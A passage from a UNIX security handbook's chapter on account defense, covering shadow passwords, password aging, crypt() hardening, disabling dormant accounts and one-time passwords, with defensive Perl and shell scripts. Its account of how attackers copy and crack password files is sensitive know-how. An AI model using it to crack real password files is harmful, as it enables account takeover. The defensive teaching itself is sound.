password encryptions per second. Versions of crypt developed for supercomputers can encrypt tens of thousands of passwords in<br />

the same amount of time. Now you can even store a database of every word in the <strong>UNIX</strong> spelling dictionary encrypted with every<br />

possible salt on a single 10 gigabyte hard disk drive, or on a few high-density CD-ROMs.<br />

Because of these developments, placing even encrypted passwords in the world-readable /etc/passwd file is no longer secure.[16]<br />

There is still no danger that an attacker can decrypt the passwords actually stored - the danger is simply that an attacker could<br />

copy your password file and then systematically search it for weak passwords. As a result, numerous vendors have introduced<br />

shadow password files.[17] <strong>UNIX</strong> systems that offer at least so-called C2-level security features have shadow password files, or<br />

the capability to install them.<br />

[16] The /etc/passwd file must be world readable, because many, many programs need to consult it for UID to<br />

account name mappings, home directories, and username information. Changing the permissions breaks quite a few<br />

essential and convenient services.<br />

[17] Shadow password files have been a standard part of AT&T <strong>UNIX</strong> since the introduction of SVR4. A number of<br />

add-on shadow password systems are available for other versions of <strong>UNIX</strong>; installing them requires having the<br />

source code to your <strong>UNIX</strong> system.<br />


Shadow password files hold the same encrypted passwords as the regular <strong>UNIX</strong> password file: they simply prevent users from<br />

reading each other's encrypted passwords. Shadow files are protected so that they cannot be read by regular users; they can be<br />

read, however, by the setuid programs that legitimately need access. (For instance, SVR4 uses the file /etc/shadow, with protected<br />

mode 400, and owned by root; SunOS uses the file /etc/security/passwd.adjunct, where /etc/security is mode 700.) The regular<br />

/etc/passwd file has special placeholders in the password field instead of the regular encrypted values. Some systems substitute a<br />

special flag value, while others have random character strings that look like regular encrypted passwords: would-be crackers can<br />

then burn a lot of CPU cycles trying dictionary attacks on random strings.<br />

If your system does not have shadow passwords, then you should take extra precautions to ensure that the /etc/passwd file cannot<br />

be read anonymously, either over the network or with the UUCP system. (How to do this is described in Chapter 15, UUCP, and<br />

Chapter 17.)<br />

If you use shadow password files, you should be sure that there are no backup copies of the shadow password file that are publicly<br />

readable elsewhere on your system. Copies of passwd are sometimes left (often in /tmp or /usr/tmp) as editor backup files and by<br />

programs that install new system software. A good way to avoid leaving copies of your password files on your system is to avoid<br />

editing them with a text editor, or to exercise special care when doing so.<br />
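Here is a sketch of such a check in Perl, using the standard File::Find module. The directories searched and the filename pattern are only starting points; adjust them for your site, and remember that a clean report does not prove there are no stray copies elsewhere.

#!/usr/local/bin/perl
#
# stray-passwd: look for files whose names suggest they are copies of
# the password or shadow files and that are readable by group or other.
# The directories and the name pattern below are only a starting point.
#
use File::Find;

@dirs = grep { -d $_ } ("/tmp", "/usr/tmp", "/var/tmp");
find(\&check, @dirs) if @dirs;

sub check {
    return unless -f $_;
    return unless /passwd|shadow/;                # name looks interesting
    my ($mode) = (stat(_))[2];
    push(@suspects, $File::Find::name) if $mode & 0044;
}

foreach $f (@suspects) {
    print "group- or world-readable password-like file: $f\n";
}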

8.8.6 Password Aging and Expiration<br />

Some <strong>UNIX</strong> systems allow the system administrator to set a "lifetime" for passwords.[18] With these systems, users whose<br />

passwords are older than the time allowed are forced to change their passwords the next time they log in. If a user's password is<br />

exceptionally old, the system may prevent the user from logging in altogether.<br />

[18] Different systems use different procedures for password aging. For a description of how to set password<br />

lifetimes on your system, consult your system documentation.<br />

Password aging can improve security. Even if a password is learned by an attacker and the account is surreptitiously used, that<br />

password will eventually be changed. Password aging can also help you discover when people have access to passwords and<br />

accounts that aren't properly registered. In one case we know about, when a computer center started password aging, four users<br />

suddenly discovered that they were all using the same account - without each other's knowledge! The account's password had<br />

simply not been changed for years, and the users had all been working in different subdirectories.<br />

Users sometimes defeat password aging systems by changing an expired password to a new password and then back to the old<br />

password. A few password aging systems check for this type of abuse by keeping track of old and invalid passwords. Others<br />

prevent it by setting a minimum lifetime on the new password. Thus, if the password is changed, the user is forced to use it for at<br />

least a week or two before it can be changed again - presumably back to the old standby.[19] If you use password aging, you<br />

should explain to your users why it is important for them to avoid reusing old passwords.<br />

[19] This is a bad idea, even though it is common on many SVR4 systems. It prevents the user from changing a<br />

password if it has been compromised, and it will not prevent a user from cycling between two favorite passwords<br />

again and again.<br />

Under SVR4, you can set password aging using the -n (minimum days before the password can be changed) and -x (maximum

number of days) options (e.g., passwd -n 7 -x 42 sally). Setting the aging value to -1 disables aging.<br />

Old-Style Password Aging<br />

Older versions of <strong>UNIX</strong> had a form of password aging available, but it was usually not documented well, if it was documented at<br />

all. We describe it here for the sake of completeness.<br />

To enable the old-style password aging, you would append a comma and two base-64 digits to the end of the password field in the<br />

/etc/passwd file for each user. The comma was not valid as part of an encoded password, and signalled that password aging was to<br />

be enabled for that user. The two digits encoded the aging parameters that are now set with the -x and -n options of the SVR4<br />

passwd command, as described previously. The base-64 encoding is the same as that used for encoding passwords, and is<br />

described in Section 8.6.1, "The crypt() Algorithm."

The first digit after the comma represented the number of weeks until the password expired (from the beginning of the current<br />

week). The second digit represented the minimum number of weeks that the password had to be kept before it could be changed<br />

again. These values would be calculated by the system administrator and then edited into the appropriate locations in the passwd<br />


file. After being set, the user would be prompted to choose a new password the next time he or she logged in. Then two more<br />

digits would be appended to the field in the file; these two digits would also be updated each time the passwd command was run<br />

successfully. These two digits encoded, in base-64, the time of the most recent password change, expressed as a number of weeks<br />

since the beginning of 1970. These digits were usually expressed in reverse order, as if base-64 wasn't obscure enough!<br />
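As an illustration, the following Perl fragment decodes such a field. It assumes the character ordering used by the a64l(3) routine (".", "/", 0-9, A-Z, then a-z for the values 0 through 63), and the sample field built into it is our own invention; check the details against your system before trusting its output.

#!/usr/local/bin/perl
#
# Decode an old-style password-aging suffix such as ",N4".
# Assumes the a64l(3) ordering: . / 0-9 A-Z a-z represent 0 through 63.
#
$chars = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";

sub a64 { return index($chars, $_[0]); }

$field = shift || ",N4";                 # example aging field (made up)
$field =~ s/^,//;
($max, $min, @last) = split(//, $field);

print "password expires after ", &a64($max), " weeks\n";
print "password must be kept at least ", &a64($min), " weeks\n";
if (@last == 2) {
    # the last-changed time is stored with the low-order digit first
    $weeks = &a64($last[0]) + 64 * &a64($last[1]);
    print "last changed in week $weeks after the start of 1970\n";
}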

Simply putting a ",." at the end of a password field would require the password to be changed at the very next login. Most systems

would then remove these characters, although we have heard tell that on some dimly remembered system, the characters would get<br />

changed into ",.z" (allow changes anytime, expire this one in 64 weeks).<br />

Few systems were shipped with software to ease the task of calculating and setting these values manually. As another drawback,<br />

the users were given no warning before a password expired - the user logged in and was forced to change the password right then<br />

and there. Everyone we know who experienced the mechanism hated it and we do not believe it was widely used. The SVR4<br />

mechanism is a great improvement, although still not ideal.<br />

NOTE: Do not use the -n option with the password aging command! Configuring your system so that users are<br />

prevented from changing their password is stupid. Users can accidentally disclose their passwords to others - for

example, they might say their new password out loud when they are typing it in for the first time. If users are required<br />

to wait a minimum time before changing their passwords again, then their accounts will be vulnerable.<br />

Password aging should not be taken to extremes. Forcing users to change their passwords more often than once every few months<br />

is probably not helpful. If users change their passwords so often that they find it difficult to remember what their current<br />

passwords are, they'll probably write these passwords down. Imagine a system that requires users to change their passwords every<br />

day. Expiration times that are too short may make the security worse, rather than better. Furthermore, it engenders discontent -<br />

feelings that the security mechanisms are annoying rather than reasonable. You may have good passwords, but having users who<br />

are constantly angry about the security measures in place probably negates any benefits gained.<br />

On the other hand, if you want your users to change their passwords every minute, or every time that they log in, then you<br />

probably want to be using a one-time password system, such as those described in Section 8.7.1, "Integrating One-time Passwords with UNIX," earlier in this chapter.

8.8.7 Algorithm and Library Changes<br />

If you have the source code to your system, you can alter the crypt() library function to dramatically improve the resistance of<br />

your computer to password cracking. Here are some techniques you might employ:<br />

1. Change the number of encryption rounds from 25 to something over 200. This change will make the encryption routine operate more slowly, which is good. More importantly, it will make encrypted passwords generated on your computer different from passwords generated on other systems. This foils an attacker who obtains a copy of your /etc/passwd file and tries to crack it on a remote computer using standard software.

2. Add a counter to the crypt() library call that keeps track of how many times it has been called within a single process. If a user's program calls it more than 5 or 10 times, log that fact with syslog, being sure to report the user's login name, tty, and other pertinent information. Then start returning the wrong values![20]

[20] Many sites feel uncomfortable with this advice to modify a system library to return wrong values.<br />

However, in our experience, few (if any) programs need to run crypt() more than a few times in a single<br />

process unless those processes are attempting to crack passwords. On the other hand, when we have worked<br />

with sites that have had problems with password cracking, those problems have stopped immediately when the<br />

crypt() routine was modified to behave in this manner. If you feel uncomfortable having some programs<br />

silently fail, you may wish to end their silence, and have them send email to the system administrator or log a<br />

syslog message when the crypt() routine is run more than a few times.

If you decide to implement this approach, there are some issues to be aware of:<br />

1. If your system uses shared libraries, be sure to update the crypt() in the shared library; otherwise, some commands may not work properly.

2. If your system does not use shared libraries, be sure to update the crypt() function in your file libc.a, so that people who write programs that use crypt() will get the modified version.

3. Be sure to re-link every program that uses crypt() so that they all get the new version of the routine. On most UNIX systems, that means generating new versions of (at least) the following programs:

/bin/login      /usr/sbin/in.rexecd
/bin/su         /usr/sbin/in.rlogind
/bin/passwd     /usr/sbin/in.rshd
/usr/sbin/in.ftpd

4. Some programs legitimately need to call the crypt() routine more than 10 times in a single process. For example, the server of a multiuser game program, which uses passwords to protect user characters, would need to call crypt() if it stored the passwords in an encrypted form (another good idea). For programs like these, you will need to provide a means for them to run with a version of the crypt() function that allows the function to be run an unlimited number of times.

Do these techniques work? Absolutely. A few years ago, there was a computer at MIT on which guest accounts were routinely<br />

given away to members of the local community. Every now and then, somebody would use one of those guest accounts to grab a<br />

copy of the password file, crack it, and then trash other people's files. (This system didn't have shadow passwords either.) The day<br />

after the above modifications were installed in the system's crypt() library, the break-ins stopped and the system's administrators<br />

were able to figure out who was the source of the mischief. Eventually, though, the system administrators gave up on<br />

modifications and went back to the standard crypt() function. That's because changing your crypt() has some serious drawbacks:<br />

● The passwords in your /etc/passwd file will no longer be compatible with an unaltered system,[21] and you won't be able to trade /etc/passwd entries with other computers.

[21] This may be an advantage under certain circumstances. Being unable to trade encrypted passwords means being unable to have "bad" passwords on a computer that were generated on another machine. This is especially an issue if you modify your passwd program to reject bad passwords. On a recent sweep of numerous computers at AT&T, one set of machines was found to have uncrackable passwords, except for the passwords of two accounts that had been copied from other machines.

● If your site transfers /etc/passwd entries between machines as ways of transferring accounts, then you will need to have the same crypt() modifications on each machine.

● If you use NIS or NIS+, then you must use the same crypt() algorithm on all of the UNIX machines on your network.

● You'll need to install your changes every time the software is updated, and if you cease to have access to the source, all of your users will have to set new passwords to access the system.

● This method depends on attackers not knowing the exact number of rounds used in the encryption. If they discover that you're using 26 rounds instead of 25, for example, they can modify their own password-breaking software and attack your system as before. (However, this scenario is unlikely to happen in most environments; the cracker is more likely to try to break into another computer - hardly a drawback at all!)

● If an insider knows both his cleartext password and the encrypted version, he can also determine experimentally how the algorithm was changed.

NOTE: While increasing the number of rounds that the encryption algorithm performs is a relatively safe operation,<br />

don't alter the algorithm used in the actual password mechanism unless you are very, very confident that you know<br />

what you are doing. It is very easy to make a change you think is adding complexity, only to make things much<br />

simpler for an attacker who understands the algorithm better than you do.<br />

8.8.8 Disabling an Account by Changing Its Password<br />

If a user is going away for a few weeks or longer, you may wish to prevent direct logins to that user's account so the account won't<br />

be used by someone else.<br />

As mentioned earlier, one easy way to prevent logins is to insert an asterisk (*) before the first character of the user's password in<br />

the /etc/passwd file or shadow password file.[22] The asterisk will prevent the user from logging in, because the user's password<br />

will no longer encrypt to match the password stored in /etc/passwd, and the user won't know what's wrong. To re-enable the<br />

account with the same password, simply remove the asterisk.<br />

[22] This method of changing a user's password is not sufficient if the user has a .rhosts file or can rlogin from a<br />

computer in your computer's /etc/hosts.equiv file. It also will not stop the execution of programs run by the cron or at<br />


commands.<br />

For example, here is the /etc/passwd entry for a regular account:<br />

omega:eH5/.mj7NB3dx:315:1966:Omega Agemo:/u/omega:/bin/csh<br />

Here is the same account, with direct logins prevented:<br />

omega:*eH5/.mj7NB3dx:315:1966:Omega Agemo:/u/omega:/bin/csh<br />

Under SVR4, you can accomplish the same thing by using the -l option to the passwd command (e.g., passwd -l omega).

You should be sure to check for at and cron jobs that are run by the user whose account you are disabling.<br />
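A sketch of such a check in Perl appears below. The spool directories named here are typical SVR4 locations and are only assumptions; different systems keep crontab and at jobs in different places, so substitute the paths your vendor uses, or simply use your system's crontab and at listing commands.

#!/usr/local/bin/perl
#
# pending-jobs: report cron and at jobs belonging to a user whose
# account is being disabled.  The spool directories below are typical
# SVR4 locations, but they differ between systems -- substitute the
# ones your vendor actually uses.
#
$user = shift || die "usage: pending-jobs username\n";
$uid  = (getpwnam($user))[2];
die "no such user: $user\n" unless defined $uid;

# Crontab files are usually named after the account that owns them.
$crontab = "/var/spool/cron/crontabs/$user";
print "$user has a crontab: $crontab\n" if -f $crontab;

# at jobs are usually owned by the submitting user.
if (opendir(AT, "/var/spool/cron/atjobs")) {
    foreach $job (readdir(AT)) {
        next if $job =~ /^\.\.?$/;
        $owner = (stat("/var/spool/cron/atjobs/$job"))[4];
        print "$user has an at job queued: $job\n"
            if defined($owner) && $owner == $uid;
    }
    closedir(AT);
}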

Note that the superuser can still su to the account. Section 8.5, "Protecting the root Account," explains the details of

protecting accounts in a variety of other ways. Briefly, we'd also suggest that you set the login shell equal to /bin/false, or to some<br />

program that logs attempts to use it. You should also consider changing the permissions on the user's home directory to mode 000<br />

and changing the ownership to user root.<br />

As the administrator, you may also want to set expiration and inactivity time-outs on accounts. This step means that accounts<br />

cease to be valid after a certain date unless renewed, or they cease to be usable unless a valid login occurs every so often. This last<br />

case is especially important in environments where you have a dynamic user population (as in a university) and it is difficult to<br />

monitor all of the accounts. We discussed this in greater detail earlier in this chapter.<br />

8.8.9 Account Names Revisited: Using Aliases for Increased <strong>Sec</strong>urity<br />

As we described earlier in this chapter, you can give accounts almost any name you want. The choice of account names will<br />

usually be guided by a mixture of administrative convenience and user preference. You might prefer to call the accounts<br />

something mnemonic, so that users will be able to remember other usernames for electronic mail and other communications. This<br />

method is especially useful if you give your users access to Usenet and they intend to post news. A properly chosen username,<br />

such as paula, is more likely to be remembered by correspondents than is AC00045.

At the same time, you can achieve slightly better security by having nonobvious usernames. This method is a form of security<br />

through obscurity. If an attacker does not know a valid username at your site, she will have greater difficulty breaking in. If your<br />

users' account names are not known outside your site and are nonobvious, potential intruders have to guess the account names as<br />

well as the password. This strategy adds some additional complexity to the task of breaking in, especially if some of your users<br />

have weak passwords.<br />

If you use obscure account names, you need a way to protect those account names from outsiders while still allowing your users to<br />

access electronic mail and participate in Usenet discussions. The way to do this is with aliasing.<br />

If you configure one machine to be your central mail and news site, you can set your software to change all outgoing mail and<br />

news to contain an alias instead of the real account name. This is probably what you wish to do if you decide to install a firewall<br />

between your site and the outside network (see Chapter 21, Firewalls).<br />

For example, your mailer could rewrite the From: line of outgoing messages to change a line that looks like this:<br />

From: paula@home.acs.com<br />

to look like this:<br />

From: Paula.Harris@ACS.COM<br />

This address is also the electronic mail address Paula would put on her business cards and correspondence. Incoming mail to those<br />

addresses would go through some form of alias resolution and be delivered to her account. You would also make similar<br />

configuration changes to the Usenet software. There is an additional advantage to aliasing - if an outsider knows the names of his<br />

correspondents but not their account names (or machine names), he can still get mail to them.<br />

If you take this approach, other network services, such as finger and who, must similarly be modified or disabled.[23]<br />

[23] Discussing all of the various mailers and news agents that are available and how to modify them to provide<br />

aliasing is beyond the scope of this book. We suggest that you consult the <strong>O'Reilly</strong> & Associates books on electronic<br />

mail and news to get this information.<br />

Many large organizations use some form of aliasing. For example, mail to people at AT&T Bell Laboratories that's addressed to<br />


First.Last@att.com will usually be delivered to the right person.<br />


Chapter 8<br />

Defending Your Accounts<br />

8.4 Managing Dormant Accounts<br />

If a user is going to be gone for an extended period of time, you may wish to consider preventing direct logins to the user's account<br />

until his or her return. This ensures that an intruder won't use the person's account in his or her absence. You may also wish to disable

accounts that are seldom used, enabling them only as needed.<br />

There are three simple ways to prevent logins to an account:<br />

1. Change the account's password.

2. Modify the account's password so it can't be used.

3. Change the account's login shell.

Actually, you may want to consider doing all three.<br />

8.4.1 Changing an Account's Password<br />

You can prevent logins to a user's account by changing his password to something he doesn't know. Remember, you must be the<br />

superuser to change another user's password.<br />

For example, you can change mary's password simply by typing the following:<br />

# passwd mary<br />

New password: dis1296<br />

Retype new password: dis1296<br />

Because you are the superuser, you won't be prompted for the user's old password.<br />

This approach causes the operating system to forget the user's old password and install the new one. Presumably, when the proper<br />

user of the account finds herself unable to log in, she will contact you and arrange to have the password changed to something else.<br />

Alternatively, you can prevent logins to an account by inserting an asterisk in the password field of the user's account. For example,<br />

consider a sample /etc/passwd entry for mary:<br />

mary:fdfdi3k1j1234:105:100:Mary Sue Lewis:/u/mary:/bin/csh<br />

To prevent logins to Mary's account, change the password field to look like this:<br />

mary:*fdfdi3k1j1234:105:100:Mary Sue Lewis:/u/mary:/bin/csh<br />

Mary won't be able to use her account until you remove the asterisk. When you remove it, she will have her original password back.<br />

We describe this in greater detail later in "Disabling an Account by Changing its Password."<br />

If you use shadow passwords on your system, be sure you are editing the password file that contains them, and not /etc/passwd. You<br />

can tell that you are using shadow passwords if the password field in /etc/passwd is blank or contains an asterisk or hash marks for<br />

every password, instead of containing regular encrypted passwords.<br />

Some <strong>UNIX</strong> versions require that you use a special command to edit the password file. This command ensures that two people are<br />

not editing the file at the same time, and also rebuilds system databases if necessary. On Berkeley-derived systems, the command is<br />

called vipw.<br />

Under System V-derived versions of <strong>UNIX</strong>, you can accomplish the same thing as adding an asterisk by using the -l option to the<br />

passwd command:<br />

# passwd -l mary<br />


NOTE: Note that if you use the asterisk in the password file to disable the account, it could still be used with su, or from<br />

a remote login using the trusted hosts mechanism (~/.rhosts file or /etc/hosts.equiv). (For more information, see Chapter<br />

17, TCP/IP Services). Thus, changing the password is not sufficient to block access to an account on such a system.<br />

8.4.2 Changing the Account's Login Shell<br />

Another way to prevent direct logins to an account is to change the account's login shell so that instead of letting the user type<br />

commands, the system simply prints an informative message and exits. This change effectively disables the account. For example,<br />

you might change the line in /etc/passwd for the mary account from this:<br />

mary:fdfdi3k1j$:105:100:Mary Sue Lewis:/u/mary:/bin/csh<br />

to this:<br />

mary:fdfdi3k1j$:105:100:Mary Sue Lewis:/u/mary:/etc/disabled<br />

You would then create a shell script called /etc/disabled:<br />

#!/bin/sh<br />

/bin/echo Your account has been disabled because you seem to have<br />

/bin/echo forgotten about it. If you want your account back, please<br />

/bin/echo call Jay at 301-555-1234.<br />

/bin/sleep 10<br />

When Mary tries to log in, this is what she will see:<br />

bigblu login: mary<br />

password: mary1234<br />

Last login: Sun Jan 20 12:10:08 on ttyd3<br />

Whammix V17.1 ready to go!<br />

Your account has been disabled because you seem to have<br />

forgotten about it. If you want your account back, please<br />

call Jay at 301-555-1234.<br />

bigblu login:<br />

NOTE: Most versions of the ftpd FTP daemon will block access for users who have shells that are not listed in the file<br />

/etc/shells. Some versions, though, will not. You should check your FTP daemon for this behavior. If it does not block<br />

access, you may wish to change both the password and the shell to disable an account.<br />

8.4.3 Finding Dormant Accounts<br />

Accounts that haven't been used for an extended period of time are a potential security problem. They may belong to someone who<br />

has left or is on extended leave, and therefore the account is unwatched. If the account is broken into or the files are otherwise<br />

tampered with, the legitimate user might not take notice for some time to come. Therefore, disabling dormant accounts is good<br />

policy.<br />

One way to disable accounts automatically when they become dormant (according to your definition of dormant) is to set a dormancy<br />

threshold on the account. Under System VR4, you can do this with the -f option to the usermod command:<br />

# usermod -f 10 spaf<br />

In this example, user spaf will have his account locked if a login is not made at least once during any 10-day period. (Note that<br />

having an active session continue operation during this interval is not sufficient - the option requires a login.)<br />

If your version of <strong>UNIX</strong> is not SVR4 and does not have something equivalent, you will need to find another way to identify dormant<br />

accounts. Below is a simple shell script called not-this-month, which uses the last command to produce a list of the users who haven't<br />

logged in during the current month. Run it the last day of the month to produce a list of accounts that you may wish to disable:<br />

#!/bin/sh<br />

#<br />

# not-this-month:<br />



# Gives a list of users who have not logged in this month.<br />

#<br />

PATH=/bin:/usr/bin;export PATH<br />

umask 077<br />

THIS_MONTH=`date | awk '{print $2}'`<br />

/bin/last | /bin/grep $THIS_MONTH | awk '{print $1}' | /bin/sort -u > /tmp/users1$$<br />

cat-passwd | /bin/awk -F: '{print $1}' | /bin/sort -u > /tmp/users2$$<br />

/bin/comm -13 /tmp/users[12]$$<br />

/bin/rm -f /tmp/users[12]$$<br />

The following explains the details of this shell script:<br />

umask 077<br />

Sets the umask value so that other users on your system will not be able to read the temporary files in /tmp.<br />

PATH=/bin:/usr/bin
Sets up a safe path.

THIS_MONTH=`date | awk '{print $2}'`
Sets the shell variable THIS_MONTH to be the name of the current month.

last
Generates a list of all of the logins on record.

| grep $THIS_MONTH
Filters the above list so that it includes only the logins that happened this month.

| awk '{print $1}'
Selects out the login name from the above list.

| sort -u
Sorts the list of logins alphabetically, and removes multiple instances of account names.

cat-passwd | awk -F: '{print $1}'
Generates a list of the usernames of every user on the system.[4]

[4] Recall that we told you earlier that we would define cat-passwd to be the system-specific set of commands to print the contents of the password file.

comm -13
Prints items present in the second file, but not the first: the names of accounts that have not been used this month.

This shell script assumes that the database used by the last program has been kept for at least one month.<br />

After you have determined which accounts have not been used recently, consider disabling them or contacting their owners. Of<br />

course, do not disable accounts such as root, bin, uucp, and news that are used for administrative purposes and system functions. Also<br />

remember that users who only access their account with the rsh (the remote shell command) or su commands won't show up with the<br />

last command.<br />

End Historical Accounts!<br />

We have seen cases where systems had account entries in the password file for users who had left the organization years before and<br />

had never logged in since. In at least one case, we saw logins for users that had not been active for more than three years, but the<br />

accounts had ever-expanding mailboxes from system-wide mail and even some off-site mailing lists! The problem was that the policy<br />

for removing accounts was to leave them until someone told the admin to delete them - something often overlooked or forgotten.<br />

The easiest way to eliminate these historically dormant accounts on your system is to create every user account with a fixed<br />

expiration time. Users of active accounts should be required to renew their accounts periodically. In this way, accounts that become<br />

dormant will automatically expire if not renewed and they don't become a liability.<br />

Under SVR4, you can do this with the usermod command:<br />


# usermod -e 12/31/97 spaf<br />

Other systems may have a method of doing this. If nothing else, you can add an entry to the crontab to mail you a reminder to disable<br />

an account when it expires. You must couple this with periodic scans to determine which accounts are inactive, and then remove<br />

them from the system (after archiving them to offline storage, of course).<br />

By having users renew their accounts periodically, you can verify that they still need the resources and access you have allocated.<br />

You can also use the renewal process as a trigger for some user awareness training.<br />

NOTE: In most environments, the last program only reports logins and logouts on the computer running it. Therefore,<br />

this script will not report users who have used other computers that are on the network, but have not used the computer<br />

on which the script is being run.<br />

Discovering dormant accounts in a networked environment can be a challenging problem. Instead of looking at<br />

login/logout log files, you may wish to examine other traces of user activity, such as the last time that email was sent or<br />

read, or the access times on the files in a user's home directory.<br />
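For example, the following Perl sketch flags accounts whose home directories show no recent activity. The 60-day threshold, the UID cutoff used to skip system accounts, and the decision to look only at the top-level directory timestamps are all assumptions to tune for your site; treat its output as a hint, not as proof of dormancy.

#!/usr/local/bin/perl
#
# quiet-homes: list accounts whose home directories have not been read
# or modified recently.  The 60-day threshold and the UID cutoff are
# assumptions -- tune them for your site, and remember that this is
# only one rough indicator of dormancy.
#
$days = 60;
$now  = time();

while (($name, $passwd, $uid, $gid, $q, $c, $gcos, $dir) = getpwent()) {
    next if $uid < 100;                   # skip system accounts (site-specific)
    next unless $dir && -d $dir;
    ($atime, $mtime) = (stat(_))[8, 9];
    $idle = ($now - ($atime > $mtime ? $atime : $mtime)) / (60 * 60 * 24);
    printf "%-8s idle about %d days (home: %s)\n", $name, $idle, $dir
        if $idle > $days;
}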


Chapter 8<br />

Defending Your Accounts<br />

8.7 One-Time Passwords<br />

If you manage computers that people will access over the <strong>Internet</strong> or other computer networks, then you<br />

should seriously consider implementing some form of one-time password system. Otherwise, an attacker<br />

can eavesdrop on your legitimate users, capture their passwords, and use those passwords again at a later<br />

time.<br />

Is such network espionage likely? Absolutely. In recent years, people have broken into computers on key<br />

networks throughout the <strong>Internet</strong> and have installed programs called password sniffers (illustrated in<br />

Figure 8.2). These programs monitor all information sent over a local area network and silently record<br />

the first 20, 50 or 128 characters sent over each network connection.[12] In at least one case, a password<br />

sniffer captured tens of thousands of passwords within the space of a few weeks before the sniffer was<br />

noticed; the only reason the sniffer's presence was brought to the attention of the authorities was because<br />

the attacker was storing the captured passwords on the compromised computer's hard disk. Eventually,<br />

the hard disk filled up, and the computer crashed!<br />

[12] Some sniffers have been discovered "in the wild" that record 1024 characters, or even<br />

the entire Telnet session. Sniffers have also recorded FTP and NFS transactions.<br />

Figure 8.2: Password sniffing<br />


One-time passwords,[13] as their name implies, are passwords which can be used only once, as we<br />

explained in Chapter 3, Users and Passwords. They are one of the few ways of protecting against

password sniffers.<br />

[13] Encryption offers another solution against password sniffing, although it is harder to<br />

implement in practice because of the need for compatible software on both sides of the<br />

network connection.<br />

Another application which demands one-time passwords is mobile network computing, where the<br />

connection between computers is established over a radio channel. When radio is used, passwords are<br />

literally broadcast through the air, available for capture by anybody with a radio receiver. One way to<br />

ensure that a computer account will not be compromised is to make sure that a password, after<br />

transmittal, can never be used again.<br />

There are many different one-time password systems available. Some of them require that the user carry<br />

a hardware device, such as a smart card or a special calculator. Others are based on cryptography, and<br />


require that the user run special software. Still others are based on paper. Figure 8.3, Figure 8.4, and<br />

Figure 8.5 show three commonly used systems; we'll describe them briefly in the following sections.<br />

8.7.1 Integrating One-time Passwords with <strong>UNIX</strong><br />

In general, you do not need to modify existing software to use these one-time password systems. The<br />

simplest way to use them is to replace the user's login shell (as represented in the /etc/passwd file; see<br />

"Changing the Account's Login Shell") with a specialized program to prompt for the one-time password.<br />

If the user enters the correct password, the program then runs the user's real command interpreter. If an<br />

incorrect password is entered, the program can exit, effectively logging the user out. This puts two<br />

passwords on the account - the traditional account password, followed by the one-time password.<br />

For example, here is an /etc/passwd entry for an account to which a <strong>Sec</strong>urity Dynamics <strong>Sec</strong>urID card key<br />

will be required to log in (see the next section):<br />

tla:TcHypr3FOlhAg:237:20:Ted L. Abel:/u/tla:/usr/local/etc/sdshell<br />

If you wish to use this technique, you must be sure that users cannot use the chsh program to change their<br />

shell back to a program such as /bin/sh, which does not require one-time passwords.
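The skeleton of such a replacement shell is simple. In the sketch below, the one_time_password_ok() routine is a placeholder for whatever verification call your token vendor or S/Key implementation provides; we are illustrating only the prompt-then-exec structure, not a real authentication check.

#!/usr/local/bin/perl
#
# otpshell: skeleton "second password" login shell.  It prompts for a
# one-time password and, if the check succeeds, replaces itself with
# the user's real shell.  The one_time_password_ok() routine is a
# placeholder -- substitute the verification call supplied by your
# token vendor or S/Key implementation.
#
$realshell = "/bin/csh";                   # the user's real shell
$user = (getpwuid($<))[0];                 # who is logging in

system("stty", "-echo");                   # don't echo the response
print "One-time password: ";
$response = <STDIN>;
system("stty", "echo");
print "\n";

exit(1) unless defined $response;          # EOF: log the user out
chomp($response);
exit(1) unless &one_time_password_ok($user, $response);

exec($realshell) || die "cannot exec $realshell: $!\n";

sub one_time_password_ok {
    local($who, $answer) = @_;
    # Placeholder: always refuse.  Replace this with a real check.
    return 0;
}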

A few versions of <strong>UNIX</strong> allow the system administrator to specify a program (or series of programs) to<br />

be used instead of, or in addition to, the standard password authentication. In these systems, the<br />

program(s) are run, one after another, and their return codes are examined. If any exit with an error code,<br />

the login is refused. AIX is one such system, and future versions of Solaris are slated to include such<br />

functionality.<br />

NOTE: There are many ways to gain access to a <strong>UNIX</strong> system that do not involve running a<br />

shell, such as FTP and NFS. If you use a special shell to implement one-time-passwords,<br />

these methods of access will not use the alternative authentication system unless they are<br />

specifically modified. You may wish to disable them if you are unable to replace them with<br />

versions that use the alternate authentication mechanism.<br />

8.7.2 Token Cards<br />

One method is to use some form of token-based password generator. In this scheme, the user has a small<br />

card or calculator with a built-in set of pre-programmed authentication functions and a serial number. To<br />

log in to the host, the user must use the card, in conjunction with a password, to determine the one-time<br />

password. Each time the user needs to use a password, the card is consulted to generate one. Each use of<br />

the card requires a password known to the user so that the card cannot be used by anyone stealing it.<br />

The usual approach is for the card to perform a calculation based on the time and a secret function or serial

number. The user reads a number from a display on the card, combines it with a password value, and<br />

uses this as the password. The displayed value on the card changes periodically, in a non-obvious<br />

manner, and the host will not accept two uses of the same number within this interval.<br />

The <strong>Sec</strong>urID shown in Figure 8.3 is one of the best-known examples of a time-based token. One version<br />

of the <strong>Sec</strong>urID card is based on a patented technology to display a number that changes every 30-90<br />

seconds. The number that is displayed is a function of the current time and date, and the ID of that<br />


particular card, and is synchronized with the server. Another version has a keypad which is used to enter<br />

a personal identification number (PIN) code. (Without the keypad, a password must be sent, and this<br />

password is vulnerable to eavesdropping.) The fob version shown in the figure provides stronger<br />

packaging; it's especially good for people who don't carry wallets or handbags, and carry the device in a<br />

pocket. The cards are the size of a credit card and have a small LCD window to display the output.<br />

Figure 8.3: <strong>Sec</strong>urity Dynamics SECURID cards and fob<br />

A second approach taken with tokens is to present the user with a challenge at login. The <strong>Sec</strong>ureNet key<br />

shown in Figure 8.4 is a token that implements a simple, but secure, challenge-response system. Unlike<br />

the <strong>Sec</strong>urity Dynamics products, the <strong>Sec</strong>ureNet key does not have an internal clock. To log in, the user<br />

contacts the remote machine, which displays a number as a challenge. The user types the challenge<br />

number into the card, along with its PIN. The key calculates a response and displays it. The user then<br />

types the response into the remote computer as her one-time password. The <strong>Sec</strong>ureNet key can be<br />

programmed to self-destruct if an incorrect password is entered more than a predefined number of times.<br />
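To make the exchange concrete, here is a toy Perl version of a challenge-response calculation. It is emphatically not the algorithm used by the SecureNet key or any other commercial token - real tokens use carefully designed cryptographic functions - but it shows how the host and the token, sharing a secret, can compute a matching response without the secret itself ever crossing the network.

#!/usr/local/bin/perl
#
# toytoken: a toy challenge/response calculation.  This is NOT the
# algorithm used by any real token -- it merely illustrates how both
# sides can derive a response from a shared secret, a PIN, and a
# challenge without transmitting the secret.
#
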